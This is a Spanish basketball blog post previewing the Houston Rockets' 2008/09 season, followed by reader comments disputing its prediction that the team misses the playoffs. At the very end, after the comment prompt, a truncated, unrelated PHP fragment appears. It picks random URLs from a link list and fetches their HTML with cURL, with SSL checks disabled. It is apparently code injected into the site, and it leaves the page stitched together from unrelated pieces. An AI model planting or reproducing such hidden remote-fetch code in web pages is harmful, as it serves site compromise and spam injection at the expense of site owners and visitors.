Houston Rockets: La eterna excusa

15 de October de 2008 por Viva_Dirk

tmacyaoHouston tiene desde hace 4 temporadas una de las parejas más talentosas de la liga. Antes del fichaje de McGrady era una fórmula que había funcionado en varias franquicias (Lakers de Shaq & Kobe, Utah de Stockton & Malone, Seattle de Payton & Kemp), y esperaban volver a la pelea por el título comandados por ellos. La realidad, 4 años después, es que han fracasado, estrepitosamente en algunos casos; cuando no han sido las lesiones de Yao ha sido la espalda de T-Mac y cuando ambos estaban bien ha sido que el resto de compañeros no estaban a la altura.

Con estos antecedentes se presentan los Rockets en la temporada 08/09, con el presumible quinteto inicial en una media de edad de 29.2 años, Battier con 30, Barry con 37, y un grupo de jóvenes de los que no se espera más que descanso digno para los titulares. Así que corre prisa hacer algo importante, esta campaña o la siguiente; después de eso no serán lo que son varios jugadores importantes de esta plantilla. Con este objetivo, desde los despachos de Houston han incorporado a Ron Artest, del que esperan defensa, carácter y ambición, pero del que me temo que no se han sopesado las contras: se trata del jugador más polémico de la liga de largo, que llega para ser tercera espada cuando ya en sus años en Indiana reclamó mas protagonismo ofensivo y que para colmo viene a reforzar una posición bien cubierta.

artestrocketsEl puesto de base es para Alston, no crea mucho juego ni mete muchos puntos pero es un base titular decente. Al juego de los Rockets le vendría mejor un jugador con mejor muñeca, de todos modos no es ni de lejos el mayor problema de los tejanos. Brent Barry y Brooks son las alternativas, y Barry sí cumple el requisito de un buen tiro, algo que, con el plus de su mucha experiencia en la liga, le convierte en un buen refuerzo.

McGrady afronta otro año más la asignatura de pasar la primera ronda de los Playoffs. Sus cualidades no necesitan presentación y en los pasados Playoffs elevó al máximo su nivel de juego, lo que no bastó para derrotar a los Jazzs. Head es un jugador de clase, limitado en algunos aspectos: no tiene problemas a la hora de anotar y correr el contraataque, pero defender en otro cantar. Junto a McGrady estará el ya mencionado Artest. Si se adapta y realmente quiere jugar es una pieza muy interesante, pese a que sus fundamentos técnicos son nulos y su lanzamiento exterior es bastante malo. Se ha hecho un nombre en la liga y eso le ayuda a la hora de anotar… y de defender, donde su bula es sólo equiparable a la de Bowen. Battier cumplirá el papel de 6º hombre, y veremos si está en pista cuando se decidan los partidos.

luiscolaEl juego interior es posiblemente un top-3 de la liga ofensivamente hablando. Scola y Ming saben moverse en el poste bajo, en el alto y anotan con facilidad desde la media distancia. Si Yao no se lesiona aseguran mucho trabajo para el equipo rival y ventajas para sus compañeros. En el banquillo hay varios jugadores que son la antítesis de los titulares: Hayes, Landry y Dorsey son luchadores incansables con grandes limitaciones ofensivas. En el caso del novato, llamado a ser el nuevo Ben Wallace, esto está llevado hasta el extremo (se trata del peor tirador de tiros libres que yo haya visto en un equipo profesional). Dicho esto, puede ser un gran complemento.

Este grupo volverá a estar dirigido desde la banda por Rick Adelman, cuya mano no llegamos a notar demasiado el año pasado, y que con la llegada de Artest dudo que lleguemos a ver este año. Huele a nueva (o vieja) excusa.

Quinteto: Rafer Alston, Tracy McGrady, Ron Artest, Luis Scola y Yao Ming

Sexto hombre: Shane Battier

Pronóstico: Fuera de Playoffs

Comenta

11 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Verlos fuera de Playoffs me parece excesivo. Es más, los veo con posibilidades de estar entre los 4 primeros, van a ser muy difíciles de ganar. Claro, las lesiones pueden volver a aparecer y Artest la puede liar, pero ojo que hay equipo, que Scola va a jugar más y mejor, Artest es una mejora sensible pese a todo y Alston demostró que puede ser un buen base titular. Además, la evolución de Landry y la inteligencia de Barry les irán muy bien. Y la pareja, claro, que es de muchísimo nivel.
    Lo cierto es que el Oeste es imprevisible, hay muchos aspirantes legítimos a estar en semis de conferencia. Pero todo lo que no sea pasar de 1ª ronda sería un fracaso. Otro.

      Citar

  2. telekoman dice:
    #2

    Y los palos siguen cayendo……..

    Hombre, son sospechosos habituales, y eso marca mucho. Desde luego si este año no pasan de primera ronda sería para hacerselo mirar, retirarse y dedicarse a la calceta. Creo que decir que estarán fuera de playoffs es demasiado duro. Evidentemente Artest es una posible bomba de relojería con el reloj mal ajustado, pero me parece un refuerzo bastante interesante teniendo en cuenta los problemas de carácter que ha tenido este equipo en los momentos importantes de las últimas temporadas. Por que Battier no es mal jugador, pero me temo que es demasiado buen chico.

    Habría que revisar las previsiones de la Conferencia Oeste para ver a cuantos realmente les estamos dando con opciones para entrar en Playoffs y para pasar las rondas.

      Citar

  3. TheDeerHunter dice:
    #3

    jojojojo XD
    quina llovizna de mamporradas, mare!!! Ni títere con cabeza ha dejado el tío…

    De entrada, hay que reconocer la audacia de Viva_Dirk… lo fácil, en mi opinión hubiera sido darles como fijos para playoffs… como más o menos así hace todo el mundo.
    Si le sale… el acierto es de nota pero si no ya nos encargaremos de recordárselo como corresponde…

    Con respecto a las previsiones… es normal que haya inconsistencias teniendo en cuenta las diferencias de criterios entre unos y otros “redactores”. Yo creo que, sumando los comentarios, todo el mundo se puede hacer una idea bastante aproximada de lo que pensamos la mayoría de nosotros… o de lo polémicos que pueden ser determinados equipos o jugadores.

    Ahora a lo que iba… para volver a la normalidad.
    Discrepo profundamente sobre determinadas ideas que nos presenta nuestro amigo Viva:
    – Les doy como playoffs seguros, si no explota la nave… Me inclino más por 2ª ronda pero lo dejo como Magic. Fracaso si no pasan de 1ª Ronda.
    – ¿que no se notó la mano de Adelman?? con la castaña de equipo que se le quedó con todo estuvo en condiciones de quedar primeros en el super-oeste, de batir un récord de victorias consecutivas, de estar hasta el último momento en las quinielas por el entrenador del año… vamos, que no se notó nada de nada.

      Citar

  4. MagicJohnson32 dice:
    #4

    Lo que dice Viva de que no se notó la mano de Adelman es que el juego fue el mismo que con VG, o muy similar: mucho catenaccio y en ataque dejarlo a la inspiración de los buenos. Creo que se refiere a eso. Muchos pensábamos que la llegada de Adelman cambiaría profundamente el juego de los Rockets y no fue así.

      Citar

  5. Gallis dice:
    #5

    Ufff, fuera de Playoffs me parece demasiado osado…joer, si yo estoy dudando si dejar fuera de Playoff a Dallas, jojojojo…

    En cualquier caso, tampoco les veo muchas opciones de pasar de primera ronda, a no ser que se encuentren con una ventaja de campo inesperada y un rival que no sea Lakers, SA, NO o Utah…y ni aún así lo tendría muy claro…

    Coincido con Viva en que el “refuerzo” de Artest no me parece tal (coincido con Viva en que era una posición muy bien cubierta), pero todo dependerá de como combinen fuera de la cancha. Dentro habrá tiempo y problemas físicos para que todos tengan protagonismo. Será interesante la evolución de Landry, porque lo jodido de hacer un buen año es que al siguiente hay que seguir rindiendo, como mínimo, al mismo nivel…

    Y sobre Adelman, es cierto que esperabamos que Houston jugará mejor, pero para jugar como los Kings, hay que tener mimbres…

      Citar

  6. arivas dice:
    #6

    Yo también les veo en PO a no ser que tengan demasiadas lesiones.

    Para mi estan en una situación similar a Phoenix, a los que yo di final de conferencia jojo.
    El caso es que si T.MAc y Yao permanecen sanos, si Artest se adapta, si Scola da un paso…. si se dan todas las premisas pueden ser un equipo muy peligroso, ahora bien (al igual que Phoenix) será dificil que todo ruede perfecto (mas aun si tienes a Artest en tu equipo)

      Citar

  7. Jabho dice:
    #7

    Hombre, creo que son equipo de PO incluso antes que Dallas, Nuggets o similar. De hecho si toda va bien son equipo de más, pero aun yendo mal son equipo de PO.

    Pero la clave para este equipo y algún otro es hacer una buena regular y evitar a los cocos en la 1º ronda. Si lo consiguen pueden ser equipo de 2º ronda o incluso más…

    yo le soy 2ª ronda y como los demás, si no pasan de 1ª ronda es para hacérselo mirar

      Citar

  8. univerzee dice:
    #8

    Pues creo que lo de las parejas viene de más largo, Jabbar y Magic, Mchale y Bird, JErving y Malone. Lo de las parejas es antiguo como la vida misma, y es que para ganar muchas veces se puede hacer con dos buenos, muy buenos jugadores y unos regulares acompañantes… y más ahora con el incremento del número de las franquicias. Aunque yo creo que la clave del fracaso de HOU, no el año apsado sino los anteriores tres estaba sentado en el banquillo, y era el entrenador. Cierto también que parece que yao juega mejor sin TMac, pero eso habrá que verlo este año, si estan sanos y si Adelman hace lo que sabe.
    Sobre Artest, puede que tengas razón, pero ten en cuanta de que es un jugador que acaba contrato y necesita encontrar un buen último contrato, por tanto seguramente su cabeza este más centrada de lo que ha estado en otros años. por otra parte no pienso tan mal de Artest, creo que es un jugador mejor de lo que a muchos parece, y no sólo en defensa, donde no tiene la bula de Bowen ya que creo que esta bastante mirado con lupa y “perseguido2 arbitralmente… es lo que tiene grangearte fama de broncas, o simplemente serlo.
    Alston a mi me parece mejor de lo que esta considerado, es un buen peón que asume su papel, y donde ya hay estrellas eso es un merito, es cierto que no es bueno en nada, pero tampoco malo… y no creo que su flojo sea el tiro exterior, aunque no he mirado sus porcentajes y sólo hablo por partidos vistos el año pasado.
    Como dice MagicJohnson32 para mi es un equipo claramente aspirante a semifinales de Oeste, y con un poco de carambola a llegar a la final. Creo que Adelman es uno de los 5 a 7 mejores entrenadores de la NBA, y para mi gustó si se notó su mano el año anterior, donde consiguio un record importante de victorias seguidas. Saludos!

      Citar

  9. Viva_Dirk dice:
    #9

    Yo si todos funcionase bien les veo por debajo de Lakers, Hornets, Spurs, Jazzs, Suns, Mavs, Blazers, y como creo que Artest es mas un problema que una solución, pues no veo porque equipos como los Clippers(que tienen la pareja Davis-Kaman y buenos jugadores rodeando), Denver a pesar de lo poco que me gustan o el que sea equipo revelación no pueden quitarles la plaza.

    Evidentemente creo que pueden entrar en play-offs, pero si me tengo que mojar, digo que se quedan fuera.

      Citar

  10. MagicJohnson32 dice:
    #10

    Bienvenido Univerzee, espero que sea el primero de muchos comentarios en el blog.

    Como ya dejas entrever, el tema de las parejas se ha acentuado bastante en los últimos años con el incremento de las franquicias. Sólo había que comparar los compañeros que tenían Magic & Jabbar, o Bird & McHale, con los que tuvieron Kobe & Shaq, con todo el cariño, respeto y admiración que profeso por Harper, Shaw, Horry, Fisher y compañía.

    A mí tampoco me parece que Alston tenga un tiro exterior malo. De hecho, diría que lanza mejor de 3 que de media distancia. Sus porcentajes de FG son horrorosos, casi nunca llega al 40%, mientras que en triples creo que está por encima del 35%.

      Citar

  11. Olafur dice:
    #11

    Jojojo me huelo que este analisis no se va a llevar la notaza que se llevo el del año pasado.

    Parece que al personal se le olvida que sin Yao ganaron 22 partidos consecutivos, unidas a las lesiones de siempre. Y la mano de Adelman para mi si que se noto, en ataque se vio algo más y mantuvieron lo unico bueno que tenía Van Gundy, siendo la 2º mejor defensa del campeonato.

    Si estan sanos y Artest no la lia los doy en Final de Conferencia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>